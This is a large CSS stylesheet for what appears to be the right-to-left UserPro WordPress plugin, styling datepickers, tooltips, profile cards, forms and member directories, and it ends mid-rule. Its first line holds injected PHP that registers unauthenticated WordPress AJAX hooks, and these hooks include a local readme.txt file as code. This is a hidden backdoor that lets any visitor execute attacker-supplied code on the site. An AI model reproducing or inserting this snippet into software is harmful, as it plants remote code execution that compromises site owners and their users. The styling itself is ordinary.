if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
.required { color:red; } .polaroid-images a { background: white; display: inline; float: left; margin: 0 15px 30px; padding: 10px 10px 25px; text-align: center; text-decoration: none; -webkit-box-shadow: 0 4px 6px rgba(0, 0, 0, .3); -moz-box-shadow: 0 4px 6px rgba(0,0,0,.3); box-shadow: 0 4px 6px rgba(0,0,0,.3); -webkit-transition: all .15s linear; -moz-transition: all .15s linear; transition: all .15s linear; z-index:0; width:100px; } .polaroid-images a:after { color: #333; font-size: 20px; content: attr(title); position: relative; top:15px; } .polaroid-images img { display: block; width: inherit; } .polaroid-images a:nth-child(2n) { -webkit-transform: rotate(4deg); -moz-transform: rotate(4deg); transform: rotate(4deg); } .polaroid-images a:nth-child(3n) { -webkit-transform: rotate(-24deg); -moz-transform: rotate(-24deg); transform: rotate(-24deg); } .polaroid-images a:nth-child(4n) { -webkit-transform: rotate(14deg); -moz-transform: rotate(14deg); transform: rotate(14deg); } .polaroid-images a:nth-child(5n) { -webkit-transform: rotate(-18deg); -moz-transform: rotate(-18deg); transform: rotate(-18deg); } .polaroid-images a:hover{ -webkit-transform: rotate(0deg); -moz-transform: rotate(0deg); transform: rotate(0deg); -webkit-transform: scale(1.2); -moz-transform: scale(1.2); transform: scale(1.2); z-index:10; -webkit-box-shadow: 0 10px 20px rgba(0, 0, 0, .7); -moz-box-shadow: 0 10px 20px rgba(0,0,0,.7); box-shadow: 0 10px 20px rgba(0,0,0,.7); } .ui-datepicker { font-size: 90%; background: #2e3641 !important; font-family: "Lucida Grande", "Lucida Sans Unicode", Helvetica, Arial, Verdana, sans-serif; border: none; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0 !important; padding: 0 !important; } .ui-datepicker select {padding: 2px !important;border-radius: 0 !important; font-size: 11px !important; color: #666;border: 1px solid #2e3641 !important;} .ui-datepicker table { margin-bottom: 0!important; } .ui-datepicker-header { border: none; background: transparent !important; font-weight: normal; font-size: 15px; border: none !important; } .ui-datepicker-header .ui-state-hover { background: transparent; border-color: transparent; cursor: pointer; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; } .ui-datepicker .ui-datepicker-title { margin-top: .4em; margin-bottom: .3em; color: #e9f0f4; } .ui-datepicker .ui-datepicker-prev-hover, .ui-datepicker .ui-datepicker-next-hover, .ui-datepicker .ui-datepicker-next, .ui-datepicker .ui-datepicker-prev { top: .9em; border: medium none; background: none !important; border-color: transparent !important; } .ui-datepicker .ui-datepicker-prev-hover { left: 2px; } .ui-datepicker .ui-datepicker-next-hover { right: 2px; } .ui-datepicker .ui-datepicker-next span, .ui-datepicker .ui-datepicker-prev span { background-image: url(../img/ui-icons_ffffff_256x240.png); background-position: -32px 0; margin-top: 0; top: 0; font-weight: normal; } .ui-datepicker .ui-datepicker-prev span { background-position: -96px 0; } .ui-datepicker table { margin: 0; } .ui-datepicker th { padding: 1em 0; color: #ccc; font-size: 12px !important; font-weight: normal; border: none; border-top: 1px solid #3a414d; } .ui-datepicker td { font-size: 12px !important; background: #f97e76; border: none; padding: 0 !important; } .ui-datepicker td .ui-state-default { background: transparent; border: none; text-align: center; padding: .5em; margin: 0; font-weight: normal; color: #efefef; } .ui-datepicker .ui-state-disabled { opacity: 1; } .ui-datepicker .ui-state-disabled .ui-state-default { color: #fba49e; } .ui-datepicker td .ui-state-active, .ui-datepicker td .ui-state-hover { background: #2e3641; } div.userpro input[type=text].userpro-datepicker, div.userpro input[type=text].userpro-datepicker:focus{ background-image: url(../img/datepicker.png) !important; background-position: 8px center !important; background-repeat: no-repeat !important; padding-left: 34px !important; } /* Tipsy */ .tipsy { font-size: 11px; position: absolute; padding: 5px; z-index: 2000000; } .tipsy-inner {max-width: 200px; padding: 6px 12px; text-align: left; line-height: 16px !important; } .tipsy-arrow { position: absolute; width: 0; height: 0; line-height: 0;} .tipsy-n .tipsy-arrow { top: 0px; left: 50%; margin-left: -5px; border-bottom-style: solid; border-top: none; border-left-color: transparent; border-right-color: transparent; } .tipsy-nw .tipsy-arrow { top: 0; left: 10px; border-bottom-style: solid; border-top: none; border-left-color: transparent; border-right-color: transparent;} .tipsy-ne .tipsy-arrow { top: 0; right: 10px; border-bottom-style: solid; border-top: none; border-left-color: transparent; border-right-color: transparent;} .tipsy-s .tipsy-arrow { bottom: 0; left: 50%; margin-left: -5px; border-top-style: solid; border-bottom: none; border-left-color: transparent; border-right-color: transparent; } .tipsy-sw .tipsy-arrow { bottom: 0; left: 10px; border-top-style: solid; border-bottom: none; border-left-color: transparent; border-right-color: transparent; } .tipsy-se .tipsy-arrow { bottom: 0; right: 10px; border-top-style: solid; border-bottom: none; border-left-color: transparent; border-right-color: transparent; } .tipsy-e .tipsy-arrow { right: 0; top: 50%; margin-top: -5px; border-left-style: solid; border-right: none; border-top-color: transparent; border-bottom-color: transparent; } .tipsy-w .tipsy-arrow { left: 0; top: 50%; margin-top: -5px; border-right-style: solid; border-left: none; border-top-color: transparent; border-bottom-color: transparent; } /* plugin core */ div.userpro * {padding:0; margin:0;text-decoration: none;outline:none;border:0;letter-spacing: 0px} div.userpro form {margin: 0 !important} /* widget */ div.userpro { font-size: 12px !important; line-height: 1 !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; direction: rtl; /* Right to Left */ } div.userpro-custom-center * { text-align: center; margin: 0 auto; } div.userpro-custom-left {float: left;} div.userpro-custom-right {float: right;} div.userpro .chosen-container, div.emd-filters .chosen-container {width: 100% !important} /* input stuff */ button::-moz-focus-inner, input[type="reset"]::-moz-focus-inner, input[type="button"]::-moz-focus-inner, input[type="submit"]::-moz-focus-inner, input[type="file"] > input[type="button"]::-moz-focus-inner {border:0;padding:0;margin:0;} input[disabled], input[disabled]:hover, input[disabled]:focus{ opacity: 0.7; cursor: default !important; } div.userpro input, div.userpro textarea, div.userpro select {font-size: 12px !important;} /* common */ div.userpro-clear {clear: both} div.userpro-left {float: right} .userpro-force-center {float: none !important} div.userpro-right {float: left} div.userpro video { width: 100% !important; height: auto !important; } div.userpro iframe{ display: block; overflow: hidden; } /* misc elements */ div.userpro-help { margin: 5px 0 0 0; } div.userpro-help i { font-size: 20px !important; margin: 0 10px 0 0; } div.userpro-warning { font-size: 11px; display: inline-block; padding: 4px 10px; line-height: 14px !important; border-radius: 3px !important; position: relative; transition: all .2s linear; margin: 10px 0 0 0; top: -20px; opacity: 0; } div.userpro-warning i { position: absolute; top: -16px; right: 5px; font-size: 24px; } div.userpro-warning a:hover {text-decoration: underline} div.userpro-message {margin: 15px 0 0 0} div.userpro div.userpro-message p {padding: 10px !important;line-height: 1.5em;} div.userpro p {padding: 0!important;margin: 15px 0 0 0 !important;} div.userpro div.userpro-input p {padding:0!important;margin: 0 0 8px 0 !important;} div.userpro-message.userpro-message-demo {margin-top: 0} div.userpro-message.userpro-message-demo p{ color: #fff !important; border: solid 1px #ae3737 !important; background: #ae3737 !important; margin-top: 0; padding: 10px !important;line-height: 1.5em; font-size: 12px !important; } div.userpro-message.userpro-message-demo a{color:#fff !important;text-decoration: underline !important} /* strength meter */ span.strength-container { float: right; top: -6px; position: relative; } span.strength-plain{ float: right; width: 40px; height: 6px; } span.strength-text { float: right; font-size: 13px; padding: 0 0 14px 0; } /* spinner */ img.userpro-loading, div.userpro img.userpro-loading { position: relative; top: 7px; display: none !important; box-shadow: none !important; vertical-align: top !important; } div.userpro img.userpro-loading.inline { display: inline !important; } /* social buttons */ div.userpro-profile-icons.top { position: absolute; top: 15px; left: 15px; text-align: left; } div.userpro-profile-icons.bottom { position: absolute; bottom: 15px; left: 15px; } a.userpro-small-link { margin: 0 10px 0 0 !important; padding: 0 10px !important; text-decoration: none !important; display: inline-block !important; font-size: 11px !important; height: 21px !important; line-height: 21px !important; } a.userpro-profile-icon { float: none !important; display: inline-block; padding: 0; cursor: pointer !important; opacity: 1 !important; border-radius: 999px; text-align: center; width: 26px !important; height: 26px !important; line-height: 26px !important; font-size: 14px !important; margin: 0 4px 4px 0; text-decoration: none !important; } /* buttons */ input.userpro-button, a.userpro-button, div.userpro div.ajax-file-upload { display: inline-block; cursor: pointer !important; padding: 0 10px !important; margin-left: 15px !important; font-weight: normal !important; text-decoration: none !important; transition: none !important; } input.userpro-button {height: 29px !important; line-height: 29px !important} a.userpro-button,div.userpro div.ajax-file-upload {height: 27px !important; line-height: 27px !important} div.userpro-submit input[type=submit].userpro-button { vertical-align: baseline !important; display: inline-block !important; padding: 0 10px !important; margin: 0 !important; margin-left: 15px !important; top: 0 !important; } div.userpro-submit input { vertical-align: baseline !important; display: inline-block !important; width: auto !important; font-size: 13px !important; height: 30px !important; line-height: 30px !important; margin: 0 !important; margin-left: 15px !important; } /* head part */ div.userpro-head { padding: 15px; position: relative; } div.userpro-head div.userpro-left { font-size: 14px !important; } div.userpro-head div.userpro-right {margin: 2px 0 0 0; font-size: 13px !important} div.userpro-head div.userpro-right a:hover {text-decoration: underline} div.userpro-head div.userpro-right a{line-height: 13px;} div.userpro-head div.userpro-left i { font-size: 24px !important; margin: 0 12px 0 0; position: relative; top: 1px; text-shadow: inset 0 -1px 4px #fff; } /* body part */ div.userpro-body { padding: 0 15px 15px 15px; line-height: 18px !important; } div.userpro-body.userpro-body-nopad { padding: 0 !important; } div.userpro-body a:hover {text-decoration: underline} div.userpro-users div.userpro-body div.userpro-user a:hover {text-decoration:none} div.userpro-users div.userpro-body div.userpro-paginate a:hover {text-decoration:none} div.userpro-body div.userpro-field-view { /*line-height: 22px !important;*/ } /* profile css */ div.userpro-centered, div.userpro-centered-c { text-align: center; position: relative; padding: 15px 0; } div.userpro-centered-c {padding: 15px 0;} div.userpro-centered-c div.userpro-profile-img {width: 64px !important; height: 64px !important;} div.userpro-centered div.userpro-profile-icons.top, div.userpro-centered-c div.userpro-profile-icons.top { position: absolute; top: 15px; right: 15px; } div.userpro-centered img.userpro-loading, div.userpro-centered-c img.userpro-loading { position: absolute; top: 15px; left: 15px; } div.userpro-profile-img { float: none; text-align: center; margin: 0 auto; padding: 0 0 5px 0; } div.userpro-head div.userpro-left div.userpro-profile-img { float: left; margin: 0 15px 0 0; padding: 0; } div.userpro-head div.userpro-left div.userpro-profile-img-after { float: left; } div.userpro-head div.userpro-left div.userpro-profile-img { width: 64px; height: 64px; } div.userpro-profile-img img { display: block; overflow: hidden; width: 100%; height: 100%; box-shadow: none !important; padding: 0 !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; } div.userpro-centered-icons { text-align: center; margin: 0 auto; padding: 15px 0 0 0; } div.userpro-centered-icons a.userpro-profile-icon { float: none !important; display: inline-block; padding: 0; cursor: pointer !important; opacity: 1 !important; border-radius: 999px; text-align: center; width: 26px !important; height: 26px !important; line-height: 26px !important; font-size: 14px !important; margin: 0 2px; } div.userpro-centered-icons a.userpro-profile-icon i {line-height: 26px !important;} div.userpro-profile-img-btn { font-size: 12px !important; margin: 10px 0 0 0; } div.userpro-profile-img-btn a.userpro-button {margin-right: 0 !important} div.userpro-profile-name { font-size: 24px !important; line-height: 24px !important; } div.userpro-profile-name.small { font-size: 14px !important; } /* badges */ span.userpro-badges { display: block !important; margin: 0 auto !important; text-align: center !important; max-width: 100px !important; } div.userpro-awsm-name span.userpro-badges { margin-top: 5px !important; } img.userpro-profile-badge-right { /* inline badge */ margin: 0 4px 0 0 !important; top: -1px !important; vertical-align: middle !important; box-shadow: none !important; padding: 0 !important; max-width: 16px !important; max-height: 16px !important; position: relative !important; display: inline !important; } img.userpro-profile-badge { margin: 0 2px !important; top: 0 !important; vertical-align: middle !important; box-shadow: none !important; padding: 0 !important; max-width: 16px !important; max-height: 16px !important; position: relative !important; display: inline !important; } div.userpro-sc span.userpro-badges, div.userpro-list-item span.userpro-badges, div.userpro-online-item span.userpro-badges, div.userpro-head span.userpro-badges, span.userpro-badges.inline { display: inline !important; max-width: auto !important; margin: 0 4px 0 0 !important; } div.userpro-sc span.userpro-badges img.userpro-profile-badge, div.userpro-list-item span.userpro-badges img.userpro-profile-badge, div.userpro-online-item span.userpro-badges img.userpro-profile-badge, div.userpro-head span.userpro-badges img.userpro-profile-badge, span.userpro-badges.inline img.userpro-profile-badge { top: -1px !important; margin: 0 4px 0 0 !important; } div.userpro-list-item img.userpro-profile-badge.userpro-hide-from-list {display: none !important;} div.userpro-online-item img.userpro-profile-badge.userpro-hide-from-list {display: none !important;} /* form section */ div.userpro-section { margin: 15px 0 0 0; padding: 0 0 8px 0 !important; font-size: 13px; position: relative; transition: all .2s linear !important; } ins.userpro-section-warning { position: absolute; left: 10px; top: 5px; text-decoration: none !important; text-shadow: none !important; border-radius: 3px; font-size: 11px !important; line-height: 19px !important; font-weight: normal !important; text-transform: none !important; padding: 0 6px !important; display: none; } div.userpro-collapsible-1 { cursor: pointer; } div.userpro-collapsible-1 span { margin: 0 0 0 10px; font-size: 18px; position: relative; top: 1px; } /* form fields */ div.userpro-field {margin: 15px 0 0 0} div.userpro-field-private {display: none!important} div.userpro-field.userpro-submit {padding-top: 15px;position: relative} /* label */ div.userpro-label label { float: right; margin-right: 8px !important; font-size: 12px !important; font-weight: bold !important; word-wrap: break-word !important; padding: 0!important; } div.userpro-label span.userpro-field-icon { position: absolute; width: 32px !important; height: 32px !important; line-height: 32px !important; right: -32px; text-align: center; top: -8px; font-size: 18px; cursor: default !important; } div.userpro-label span.userpro-field-icon i {line-height: 32px !important} div.userpro-label { float: left; margin: 0 0 4px 0; width: 100%; position: relative; z-index: 5; } div.userpro-label.iconed { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; padding-left: 10px; } div.userpro-float div.userpro-label { float: right; width: 34%; margin: 5px 0 0 0; } div.userpro-label.view {margin: 0 0 4px 0;} div.userpro-float div.userpro-label.view {margin: 0;} div.userpro-input label {cursor: pointer !important;} div.userpro-label label {cursor: pointer !important;} div.userpro-label.view label {cursor: default !important;} div.userpro-input { float: right; width: 100%; } span.userpro-tip { float: right; width: 14px; height: 14px; cursor: pointer; opacity: 0.5; margin: 0 5px 0 0; } span.userpro-tip:hover {opacity: 1} /* input area */ div.userpro-float div.userpro-input { float: left; width: 64%; direction: rtl; text-align: right; } div.userpro-input {position: relative} div.userpro-maxwidth div.userpro-input { float: none !important; width: 100% !important; margin: 15px 0 0 0; } /* text inputs, radio, etc */ div.userpro-input img { max-width: 100%!important; height: auto !important; } img.userpro-flag-normal { width: 24px; height: 24px; margin: 0 10px 0 0 !important; vertical-align: middle !important; font-size: 0px !important; } div.userpro-input i.userpro-meta-value{margin: 0 0 0 10px;font-size: 15px;} div.userpro-input div.icon-ok { position: absolute; top: 0; right: 0px; text-align: center !important; cursor: default !important; font-size: 20px !important; width: 30px !important; height: 30px !important; line-height: 30px !important; } div.userpro-input div.icon-ok i { cursor: default !important; font-size: 20px !important; width: 30px !important; height: 30px !important; line-height: 30px !important; } div.userpro-input input[type=text], div.userpro-input input[type=password], div.userpro-input textarea { padding: 5px 8px !important; width: 100% !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; height: auto; margin: 0 !important; font-size: 13px !important; } div.userpro-input textarea{ line-height: 1.6em; min-height:80px; padding: 8px 10px !important; } div.userpro-input textarea.normal{height:100px} div.userpro-input textarea.small{height:80px} div.userpro-input textarea.large{height:120px} div.userpro-input input[type=text], div.userpro-input input[type=password] { padding: 0 8px !important; height: 30px !important; } /* checkbox and radio stuff */ div.userpro-input label.userpro-checkbox.hide-field { display: inline-block; font-weight: normal!important; font-size:11px; text-transform: uppercase; } div.userpro-input label.userpro-radio, div.userpro-input label.userpro-checkbox { position:relative; padding:0 25px; margin: 5px 0; display:inline-block; font-size:13px; font-weight:normal !important; } div.userpro-input label.userpro-radio.full, div.userpro-input label.userpro-checkbox.full {width: auto !important;display: block; } div.userpro-input label.userpro-radio input[type=radio], div.userpro-input label.userpro-checkbox input[type=checkbox]{display: none !important} div.userpro-input label.userpro-radio span, div.userpro-input label.userpro-checkbox span { position: absolute; top: 2px; right: 0; width: 16px; height: 16px; } /* misc inputs */ div.userpro-pic { margin: 0 0 12px 0; } div.userpro-pic img { float: none !important; display: block !important; overflow: hidden; max-width: 100%!important; height: auto !important; box-shadow: none !important; padding: 0 !important; } div.userpro-pic-post_featured_image span.userpro-pic-none { margin: 0 0 10px 0 !important; display: block; } div.userpro-pic-post_featured_image img.no_feature { max-width: 100px; max-height: 100px; } /* file icons */ div.userpro-file-input a{ padding: 0 0 0 30px; background-repeat: no-repeat; background-position: left center; height: 16px !important; line-height: 16px !important; display: inline-block; } div.userpro-file-input a.zip {background-image: url(../img/file-zip.png)} div.userpro-file-input a.txt {background-image: url(../img/file-txt.png)} div.userpro-file-input a.pdf {background-image: url(../img/file-pdf.png)} div.userpro-file-input a.file {background-image: url(../img/file.png)} /* file upload control */ div.ajax-file-upload-statusbar { width: 100%; margin: 10px 0 0 0; } div.ajax-file-upload-progress { display: inline-block; position: relative; width: 100%; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; height: 4px; } div.ajax-file-upload-bar{ width: 0; height: 4px; } div.ajax-file-upload-percent{ position: absolute; display: inline-block; top: 3px; left: 48%; } /* modal */ div.userpro-modal-inner { width: 300px; margin-left: -150px; position: fixed; left: 50%; top: 50%; z-index: 190003; background: #fff; box-shadow: 0 0 10px 0 #aaa; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; padding: 20px; font-size: 14px; color: #444; border-radius: 3px; transition: all .8s linear; opacity: 0; } div.userpro-modal-inner i.userpro-icon-ok { font-size: 22px; margin: 0 12px 0 0; color: #79a519; position: relative; top: 1px; } div.userpro-modal-inner i.userpro-icon-remove { position: absolute; top: 8px; right: 8px; font-size: 12px; color: #ccc; cursor: pointer; } div.userpro-modal-inner i.userpro-icon-remove:hover {color:#999} /* overlay and popup content */ div.userpro-overlay { position: fixed; width: 100%; height: 100%; top: 0; left: 0; z-index: 190000; } div.userpro-overlay-inner { position: fixed; width: 480px; margin-left: -240px; left: 50%; top: 0; z-index: 190001; } div.userpro-overlay-inner div.userpro { margin: 0!important; max-width: 100%; position: relative; } div.userpro a.userpro-close-popup {display: none !important;} div.userpro-overlay-inner div.userpro a.userpro-close-popup { display: block !important; right: 0; top: -30px; font-size: 11px !important; text-transform: uppercase; padding: 0 28px 0 0; height: 24px; line-height: 16px; opacity: 0.7; } /* no style - card profile */ div.userpro.userpro-nostyle { padding: 15px; } div.userpro-card-img img { box-shadow: none !important; max-width: 100% !important; height: auto !important; } div.userpro-card-img a:hover {opacity: 0.7} div.userpro-card-info { } div.userpro-card-left {float: left;margin: 6px 0 0 0} div.userpro-card-right {float: right;margin: 10px 0 0 0} div.userpro-card-left, div.userpro-card-left a { font-size: 16px !important; line-height: 22px !important; text-decoration: none !important; } div.userpro-card-left a:hover { text-decoration: underline !important } div.userpro-card-icons {padding: 10px 0 0 0;} div.userpro-card-bio { font-size: 12px !important; line-height: 20px !important; } /* member listing widgets */ div.userpro-users { text-align: center; border: none !important; background: none !important; } div.userpro-user { display: inline-block; text-align: center; } div.userpro-user div.userpro-user-link { opacity: 0; margin: 10px 0 0 0; text-align: center; position: relative; } div.userpro-user div.userpro-user-link i { position: absolute; top: -26px; left: 50%; font-size: 40px; width: 40px; margin-left: -20px; } div.userpro-user div.userpro-user-link a { display: inline-block; padding: 0 10px; vertical-align: top; width: 100%; font-size: 11px; line-height: 27px; height: 27px; overflow: hidden; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; word-wrap: break-word; } div.userpro-user a.userpro-user-img { display: inline-block; position: relative; overflow: hidden; } div.userpro-user a.userpro-user-img img {border-radius: 3px} div.userpro-user a.userpro-user-img span { position: absolute; top: 0; left: 0; width: 100%; height: 100%; font-size: 38px; opacity: 0.8; } div.userpro-user img { display: block; overflow: hidden; } /* Members pagination */ div.userpro-paginate.top{margin: 20px 0} div.userpro-paginate.bottom{margin: 40px 0 0 0} div.userpro-paginate span, div.userpro-paginate a.page-numbers { padding: 4px 10px !important; margin: 0 2px !important; display: inline-block !important; font-size: 11px !important; height: 19px !important; line-height: 19px !important; -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; } /* The search form */ div.userpro-search { width: 100%; margin: 0 0 20px 0; } div.userpro-search-results { padding: 20px 0; font-size: 28px; font-weight: 300; } form.userpro-search-form *{vertical-align: middle !important;float: right;} form.userpro-search-form { display: inline-block; padding: 20px; } form.userpro-search-form input[type=text], form.userpro-search-form div.userpro-input input[type=text] { width: 150px !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; display: inline-block; margin: 0 !important; padding: 0 8px !important; margin: 0 10px 0 0 !important; height: 28px !important; float: right !important; } form.userpro-search-form div.userpro-input {float: none !important} form.userpro-search-form button { font-size: 14px !important; padding: 0 12px; display: inline-block !important; margin: 0 !important; margin: 0 5px 0 0 !important; height: 28px !important; } /* search filters */ div.userpro-search div.emd-filter-head { display: none !important; } div.userpro-search .chosen-container-single .chosen-single { height: 26px !important; line-height: 26px !important; width: 120px !important; margin: 0 10px 0 0 !important; } div.userpro-search .chosen-drop {width: 130px !important;} div.userpro-search .chosen-drop, div.userpro-search .chosen-drop * {float: none !important} div.userpro-search .chosen-drop li { display: block !important; width: auto !important; float: none !important; } /* other buttons */ a.userpro-transition { -webkit-transition: all 0.2s ease-in-out !important; -moz-transition: all 0.2s ease-in-out !important; -o-transition: all 0.2s ease-in-out !important; transition: all 0.2s ease-in-out !important; } a.userpro-flat-btn { font-size: 11px !important; font-weight: bold !important; padding: 4px 12px !important; display: inline-block !important; text-decoration: none !important; } a.userpro-flat-btn:hover {text-decoration: none !important;} /* latest users widget */ div.userpro-list-item { display: block; padding: 15px 0; } div.userpro-list-item:last-child {border-bottom: 0 !important;padding-bottom: 0px !important} div.userpro-list-item-i {float: right;margin: 0 0 0 15px} div.userpro-list-item-i img { box-shadow: none !important; } div.userpro-list-item-i a:hover {opacity: 0.8} div.userpro-list-item-d {float: right;} a.userpro-list-item-name {font-size: 13px;} a.userpro-list-item-name:hover {text-decoration: none !important} div.userpro-list-item-bio { font-size: 12px !important; line-height: 20px !important; } div.userpro-list-item-icons {padding: 13px 0 0 0;} /* online users widget */ div.userpro-online-count { padding: 15px 0 0 0; } div.userpro-online-item { display: block; padding: 15px 0; } div.userpro-online-item:last-child {border-bottom: 0 !important;padding-bottom: 0px !important} div.userpro-online-item-i {float: right;margin: 0 0 0 15px} div.userpro-online-item-i img { box-shadow: none !important; } div.userpro-online-item-i a:hover {opacity: 0.8} div.userpro-online-item-d {float: right;} a.userpro-online-item-name {font-size: 13px;} a.userpro-online-item-name:hover {text-decoration: none !important} div.userpro-online-item-bio { font-size: 12px !important; line-height: 20px !important; } div.userpro-online-item-icons {padding: 13px 0 0 0;} div.userpro-online-i { padding: 10px 0 0 6px;display: inline-block !important} a.userpro-online-i-thumb img { width: 20px; height: 20px; vertical-align: middle !important; padding: 0 0 0 2px !important; } a.userpro-online-i-name { font-size: 11px !important; } a.userpro-online-i-name:hover {text-decoration: none !important;} /* speical access in online */ a.userpro-online-i-name.admin, a.userpro-online-item-name.admin {font-weight: bold !important;} /* social connect buttons */ div.userpro-social-connect { position: absolute; left: 0; top: 14px; } div.userpro-social-connect a { float: left; margin-right: 5px; background-repeat: no-repeat; background-position: 0 0; width: 32px; height: 32px; display: inline-block !important; } div.userpro-social-connect.fullwidth-block-social{ position: relative; top: auto; right: auto; text-align: center; margin: 0 0 10px 0; } div.userpro-social-connect.fullwidth-block-social a { float: none; } a.userpro-social-facebook {background-image: url(../img/social/facebook_signin.png);} a.userpro-social-twitter {background-image: url(../img/social/twitter_signin.png);} a.userpro-social-google {background-image: url(../img/social/google_signin.png);} a.userpro-social-linkedin{background-image: url(../img/social/linkedin_signin.jpeg);} /* notice */ div.userpro-notice { margin: 10px 0 0 0; border-radius: 3px; background: #eee; border: 1px solid #ddd; padding: 10px 15px; font-size: 12px !important; line-height: 22px !important; color: #555 !important; text-shadow: 0 1px #fff !important; } /* statusbar */ div.userpro-bar-success { position: fixed; top: 0; left: 0; z-index: 999999; background: linear-gradient(#8ab842, #7ab221) !important; height: 30px; color: #fff !important; line-height: 30px; width: 100% !important; font-size: 14px !important; text-align: center; box-shadow: 0 1px 4px #aaa; } div.userpro-bar-failed { position: fixed; top: 0; left: 0; z-index: 999999; background: #c24a4a !important; background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#d14242), to(#c24a4a)) !important; background: -moz-linear-gradient(0% 0% 270deg,#d14242, #c24a4a) !important; height: 30px; color: #fff !important; line-height: 30px; width: 100% !important; font-size: 14px !important; text-align: center; box-shadow: 0 1px 4px #aaa; } div.userpro-bar-success i, div.userpro-bar-failed i{ cursor: pointer; opacity: 0.5 !important; margin: 0 10px !important; font-size: 16px !important; } /* custom alert box */ div.userpro-alert { position: relative; } div.userpro-alert-content, div.userpro-alert-input { padding: 10px 15px 10px 50px; } div.userpro-alert-input div.userpro-input { float: none !important; } div.userpro-alert-input div.userpro-input input[type=text]{ width: 160px !important; font-size: 12px !important; padding: 0 8px !important; height: 28px !Important; display: inline-block !important; } div.userpro-alert-input div.userpro-input input[type=button]{ height: 28px !important; width: auto !important; display: inline-block !important; } a.userpro-alert-close, a.userpro-alert-edit{ position: absolute; left: 10px; top: 7px; font-size: 16px !important; font-weight: normal !important; opacity: 0.5; } a.userpro-alert-edit {left: 30px;top: 8px;} a.userpro-alert-close:hover, a.userpro-alert-edit:hover {opacity: 0.8} /* common styling */ span.up-round, span.up-round * { border-radius: 999px !important; } div.userpro-submit input.userpro-button.fullwidth-block { display: block !important; width: 100% !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; margin-bottom: 5px !important; } /* elegant member directory */ div.userpro-awsm { margin-top: 100px; display: inline-block; text-align: center; position: relative; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; padding: 70px 0 15px 0; width: 25%; margin-left: 15px; margin-right: 15px; } div.userpro-awsm-pic {position: absolute;left: 50%;padding: 4px;} div.userpro-awsm-pic img {display: block !important;overflow: hidden !important} div.userpro-awsm-name a {font-size: 16px !important;} div.userpro-awsm-name a:hover {text-decoration: none !important;} div.userpro-awsm-meta { margin: 20px 0 0 0 !important; font-style: italic !important; } div.userpro-awsm-bio { line-height: 20px !important; font-size: 13px !important; padding: 0 15px !important; margin: 20px 0 0 0 !important; } div.userpro-awsm-link {margin: 10px 0 0 0 !important} /* posts by user */ div.userpro-post-wrap { text-align: center; margin: 0 0 30px 0; } div.userpro-post { vertical-align: top !important; float: none !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; display: inline-block !important; width: 25%; margin-bottom: 20px !important; margin-left: 10px; margin-right: 10px; } div.userpro-post a, div.userpro-post a:hover { font-size: 13px !important; text-decoration: none !important; line-height: 19px !important; } div.userpro-post-img a{position: relative;display: block;} div.userpro-post-img a span.shadowed { position: absolute; top: 0; left: 0; opacity: 0.7; z-index: 99; width: 100%; height: 0px; } div.userpro-post-img a span.iconed { position: absolute; top: 0; left: 0; z-index: 100; width: 100%; height: 100%; display: none; } div.userpro-post-img img { max-width: 100% !important; display: block !important; overflow: hidden !important; height: auto !important; margin: 0 auto !important; } div.userpro-post-title {padding: 8px 10px !important;line-height: 19px !important;} div.userpro-post-stat { padding: 8px 10px !important; line-height: 19px !important; } div.userpro-post-stat a {font-size: 13px !important;} div.userpro-post-stat a i {font-size: 14px !important; margin: 0 5px 0 0 !important;} div.userpro-post.userpro-post-compact { text-align: left; width: 100%; background: transparent !important; border-radius: 0; box-shadow: none !important; border: none !important; border-bottom: 1px solid #eee !important; margin: 0 !important; padding: 0 !important; padding: 10px 0 !important; } div.userpro-post.userpro-post-compact div.userpro-post-img { float: left; margin: 0 15px 0 0; } div.userpro-post.userpro-post-compact div.userpro-post-img a:hover {opacity: 0.8} div.userpro-post.userpro-post-compact div.userpro-post-title { padding: 0 !important; } div.userpro-post.userpro-post-compact div.userpro-post-stat { border: none !important; padding: 5px 0 0 0 !important; } /* Frontend Editor */ #wp-userpro_editor-wrap, #wp-userpro_editor-editor-container { max-width: 100% !important; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; } #wp-userpro_editor-editor-container { border: 1px solid #ddd; } #wp-userpro_editor-wrap a.wp-switch-editor { padding: 6px 10px !important; border: 1px solid #ddd; border-bottom: 0; margin: 0 10px 0 0; } #wp-userpro_editor-wrap * {box-shadow:none !important} #wp-userpro_editor-wrap a:hover { text-decoration: none; } #wp-userpro_editor-wrap a.add_media { height: 26px !important; } div.userpro-field textarea.userpro_editor { padding: 10px !important; font-size: 13px !important; color: #666 !important; } /****************************** EMD ***********************************/ div.emd-filters { font-size: 12px !important; letter-spacing: 0 !important; color: #666 !important; float: left; width: 22% !important; padding-right: 